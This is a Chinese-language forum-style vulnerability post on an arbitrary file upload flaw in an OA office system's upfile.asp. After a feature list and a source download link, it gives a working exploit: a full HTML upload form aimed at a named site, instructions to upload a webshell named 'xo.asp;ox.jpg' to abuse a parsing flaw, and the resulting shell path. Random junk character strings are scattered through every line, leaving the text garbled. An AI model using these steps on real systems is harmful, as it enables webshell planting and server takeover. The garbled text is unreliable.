全能OA办公系统 上传漏洞+ W- ` G! Q/ y8 A4 @: G$ E
6 F2 J0 [3 b' l( b5 x$ g' \
系统介绍:
1 G) n2 g& d6 { g+ L/ G
6 s6 Q4 g% Z ?! d全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。0 ?4 d6 j) |/ U1 u" z
- M7 x5 z& M+ F3 P( b" G' d4 L7 e主要功能:
9 ^) }7 m8 M9 O6 D公司通告
; C5 R& m% J2 V/ |7 N4 \* m! b工作计划
1 I) k _/ [4 A通讯助理 6 ~; e, _/ R" @9 e; I. n7 t
客户资源 / }' R" D8 D& `. g$ a6 `! U
我的公文 3 v# d7 c/ \9 e4 k$ j4 _. t
公文传阅
% F- z; t/ R/ [) y' B/ K公共资源 % _( x4 P# h! o
资源预约 8 ^% n5 L4 g8 i. G" j" i" W4 m
今日考勤
" J$ |. e7 M2 b2 _个人计划 - u5 g% d: h1 A' ?/ M' o" w, {
个人通讯录 2 u, V; z; K6 w) |+ g8 T
个人基本档案 ( \, q9 @, F( v; D2 w: X1 G
未读邮件 0 [- I6 X$ M/ b# G
发邮件
9 u+ [% i- G$ f. o2 S收件夹
6 ]& l% {2 [( m, ~寄件夹
7 h6 Q4 Z; Q+ S/ D0 a. T2 x5 W, q网络硬盘 + ?! z T E, i: E' C1 q6 {
网络会议
8 W. k3 O! D# l% i* c# w* I9 G- |网络调查 5 W9 ^0 ^ g' P
交流论坛. W- _& O/ j2 w, M% n. q
3 z+ ]' X4 ]6 v% P& h有兴趣测试的朋友可以下源码看看
9 `* v8 I$ e( p
9 y+ a2 P8 n" f' k源码下载:
" Q- Y, R. n4 c. s4 h% U) M! I) k2 Y% ~& l% K5 R
http://www.mycodes.net/30/4750.htm$ I H5 M0 f2 z$ N, r! O' ]# j
% }5 ?: ?" h* A, Z
漏洞介绍:: m1 u2 [0 w1 n' M5 z, C6 }/ k: F
( f3 l5 u; v: S由upfile.asp上传文件漏洞引起
1 R- a* F8 p& e" f" z9 y) ~5 g9 ?. j0 {! h& A! @- d2 Q3 a
测试方法:
$ F" j. M: K* v2 @0 ^9 {3 }7 G- q8 ]5 b% f( P) C1 o- M8 ^/ X9 D
使用名小子上传http://www.itlynn.com/upfile.asp即可. N# P/ P6 \" U( a0 h/ Q
: F0 K, s9 U0 ^6 {8 s( ~* e i
如果upfile.asp文件被删除不存在。8 K/ }% s% z: H H9 j. |% s
/ v1 [/ n; Y/ G 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。! Y3 ^8 I+ F* A' B" J7 @4 j
! d& m' Q k7 X( c如果存在那么将如下代码保存为upfile.html。
* t/ g0 G+ X3 f7 B4 @) o6 l
" A8 P' Z6 O: Q" ]$ f- F% ]- A然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。
' |5 { K* P* B# c8 Y/ B8 B% b1 Q0 h( I
' B9 o! P( m/ f
2 |1 Z+ k: b1 v) T3 \6 F) I
01 <table border='0' align="center" cellpadding="5">
: f. s: Y$ ] H
. f& y E! a4 x! z. ~( ~4 }02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1"> , u5 c$ I* G% ]+ q- e
' u0 D e- n0 O
03 <tr> ( N, n0 W% n+ b$ p
' e9 S& z. x+ c3 c+ n# K2 M04 <td>报错:</td>
, H5 m; n. x. s& H$ q" a$ O
: N* O- Z# {3 {* {' k: e05 <td><input type='radio' name='errnumber' value='0'>
7 @+ x9 I3 B2 U* Z/ X& J1 F7 p
" s y' k( L6 ?. j, N06 自动更名
3 Q m- [2 z& Y6 h- `
. A! j$ T1 g* J07 <input type='radio' name='errnumber' value='1' checked>
4 W! G5 B( x/ ]! ]0 _/ | E2 T9 j
) l7 ]) y. }4 E B# v08 报错方式
% C' _7 x9 G: z) L- A, w, h. g, F! R; p! }% T( d5 r4 j! v; ~5 s. D
09 <input type='radio' name='errnumber' value='2'> 3 u: x' e+ i& I1 u( ~
0 G. b( w$ v5 B: n) S K10 直接覆盖</td> $ X( A$ x% B1 x9 L/ s
7 I) y3 d7 _9 J) Y
11 </tr> ! ^$ c$ f) e* e1 e3 u$ C
* I* M4 z6 c$ a& r3 v$ I
12 <tr> " d* X! P% B, r/ R
$ f, h3 C6 z t7 M1 u6 Z [- d, n13 <td>主题:</td> ) t- V m& Y2 U4 d2 l2 n
: M9 D7 d; I! e% D6 D$ v3 T4 X4 w+ s14 <td><input type='text' name='filename' size='30'></td> ( _: [7 |3 h! S
0 W9 l1 D0 W/ g( [1 J
15 </tr>
4 B2 Z: _& H# ~: N% h/ `( |8 {/ O) p
16 <tr> ! d7 z- Z& M6 F3 U D; I& _' P
, ~1 a' ]4 B Z+ b17 <td>文件:</td>
; \) a7 y$ O! {3 q( X1 V5 h5 @1 ]4 i3 `! a4 f5 J- k( U4 [
18 <td><input type="file"name="fruit"size="30"></td>
% R3 j1 c* F# K J3 ]4 g& D
) t$ C+ ]! `/ e0 X19 </tr> ( r7 r6 r6 R2 F6 F* `5 i
8 T" X% H. G7 N
20 <tr>
5 M* S3 f; l, A1 r' x1 j& W# l$ m3 V* I
21 <td valign='top'>简介:</td> + N2 I, X# g* L3 Y: ?
. Q& n0 N! ~0 X* }22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
3 x, L" l6 g0 [& l; p% y2 t' I5 c( K& T, D- \6 s
23 </tr>
: b7 i+ v4 ?0 O7 y
6 u4 e; M+ j `# p) i8 f, H2 Z24
: l+ r2 _/ [- U6 V$ l. e- O# j/ M2 [, K) C2 G
25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> . |/ F1 O" O/ Q$ r+ [( M$ V
; i# u- x/ C& C+ U8 M+ D: H26 </tr> 0 v; I( I$ f" q/ u, j p+ S ?
' g2 J5 i! T8 w. Q: c* M- p( K
27 </form>
, P& ?8 _. d) ?5 A* t
- v+ U1 i, K6 E" o, }1 f% [6 v然后打开上传一个文件名为xo.asp;ox.jpg的文件。- M; o& m/ C2 l2 A& D! n
- T1 Z) @5 Y7 h$ G1 v0 g / X. h$ J4 ?! p* _: f
: ~. ]: _, C4 {" f% C2 F6 D, [. |
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg
- O* M" g s K# z) ^8 ^4 P( V% p6 x7 `) _; W! n
此漏洞需要配合解析漏洞利用。
* m+ A; u7 ~, Q- R: X
, ^( _" t6 F! s* O; }- {. i |